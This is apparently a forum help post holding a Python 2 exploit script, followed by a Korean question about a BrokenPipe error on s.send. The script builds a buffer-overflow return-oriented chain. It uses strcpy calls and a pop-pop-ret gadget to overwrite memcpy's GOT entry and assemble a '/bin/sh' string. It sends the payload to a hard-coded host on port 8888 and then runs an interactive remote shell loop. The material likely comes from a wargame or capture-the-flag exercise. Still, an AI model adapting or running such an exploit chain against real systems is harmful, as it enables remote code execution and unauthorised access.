################

import time

import os

from socket import *

from struct import pack


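def p(x):
    """Pack *x* as a 32-bit little-endian unsigned integer.

    A named ``def`` instead of a lambda bound to a name (PEP 8 E731) so the
    helper has a real ``__name__`` and a docstring.

    Args:
        x: integer in the range 0 .. 0xFFFFFFFF.

    Returns:
        The 4-byte little-endian encoding (``str`` on Python 2, ``bytes`` on
        Python 3).

    Raises:
        struct.error: if *x* is outside the unsigned 32-bit range or is not
            an integer.
    """
    return pack("<L", x)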

################


# Addresses inside the write-up's target binary. They come from the original
# post and cannot be checked from this script alone; if the binary differs in
# any way every value here has to be re-derived from it.
strcpy = 0x8048438
memcpy = 0x8048418
memcpy_got = 0x8049850   # copy destination at offsets +0..+3 in the payload below
binsh = 0x8049878        # copy destination at offsets +1..+7 in the payload below

# Copy sources used by the payload. Each presumably points at a single byte the
# chain needs at that position -- inferred from the usage, not verified here.
str1 = 0x8048138
str2 = 0x80482b4
str3 = 0x804817c
str4 = 0x80484d0         # same value as 0x80484c8 + 8
str_slash = 0x8048114
str5 = 0x8048117
str6 = 0x8048116
str7 = str_slash + 10    # same value as 0x8048114 + 10
str8 = 0x8048746
str9 = 0x80481b8

# Gadget address placed after every strcpy entry; the name suggests a
# pop-pop-ret sequence, which this script does not verify.
ppr = 0x80484f3


################


# (destination, source) pairs in the exact order the original chain lists them.
# Every pair expands to the same four words as before: strcpy, ppr, dst, src.
# The order is load-bearing -- do not sort or dedupe this table.
copies = [
    (memcpy_got, str1),
    (memcpy_got + 1, str2),
    (memcpy_got + 2, str3),
    (memcpy_got + 3, str4),
    (binsh + 1, str_slash),
    (binsh + 2, str5),
    (binsh + 3, str6),
    (binsh + 4, str_slash),
    (binsh + 5, str7),
    (binsh + 6, str8),
    (binsh + 7, str9),
]

# 268 filler bytes, then the copy entries, then memcpy / 4 filler bytes / binsh,
# joined once instead of repeated string concatenation. The resulting bytes are
# identical to the original step-by-step build.
chunks = ["\x41" * 268]
for dst, src in copies:
    chunks.extend([p(strcpy), p(ppr), p(dst), p(src)])
chunks.extend([p(memcpy), "\x41" * 4, p(binsh)])
payload = ''.join(chunks)


###############


# Indentation of the pasted original was lost; the loop body below is the
# only reading consistent with the `while True:` / `break` structure.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.16.135',8888))

# Deliver the payload followed by a newline and print whatever comes back first.
s.send(payload+'\n')
print(s.recv(1024))

# Line-oriented session: each input line is sent with a trailing newline,
# one reply is read and printed, then the loop pauses for two seconds.
# Typing 'exit' ends the session; the socket is closed exactly once below
# (the original closed it twice on exit, which is a no-op the second time).
while True:
    cmd = raw_input('$ ')
    if cmd == 'exit':
        break
    s.send(cmd+'\n')
    print(s.recv(1024))
    time.sleep(2)

s.close()


###############



익스플로잇에서 한참 삽질하고 있는데 s.send(cmd+'\n') 에서 BrokenPipe 에러가 나더라구요..

왜 그런지 아시는 분 도와주시면 감사하겠습니다..

